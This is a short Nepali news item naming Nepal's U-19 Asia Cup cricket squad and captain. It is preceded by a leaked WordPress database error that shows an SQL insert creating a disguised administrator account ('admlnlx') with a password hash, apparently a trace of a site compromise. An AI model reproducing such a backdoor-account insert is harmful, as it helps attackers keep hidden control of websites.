WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwaPmVhOG0HM6X1mM/IBxEMY0w6A8s.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:48:38', '', 'admlnlx', 'admlnlx')
काठमान्डों,मंसिर २०-
एसीसी यू–१९ एसिया कप क्रिकेटका लागि नेपाली टोलीको घोषणा भएको छ । र, कप्तानको जिम्मेवारी सन्दिप लामिछानेलाई दिइएको छ ।
नेपाली टोलीमा अधिकांश नयाँ अनुहार छ । टोलीमा परेका अभिनाष कर्ण, असिफ शेख, दिपेन्द्र सिंह ऐरी र सन्दिप सुनार यसअघि यूू–१९ खेलिसकेका क्रिकेटर छन् ।
अन्य सदस्यमा रविन्द्रजंग शाही, आदिल खान, भीम सार्की, अनिलकुमार शाह, पवन सर्राफ, सुवार्णकर उराव, कमल सिंह ऐरी, नन्दन यादव, प्रकाश केसी र रोहितकुमार पौडेल छन् । वैकल्पिक खेलाडीमा शाहब आलम, किशोर महतो, विक्रम भुसाल र सुसान्त थापा छन् ।
एसिया कप डिसेम्बर १३ देखि श्रीलंकामा हुनेछ ।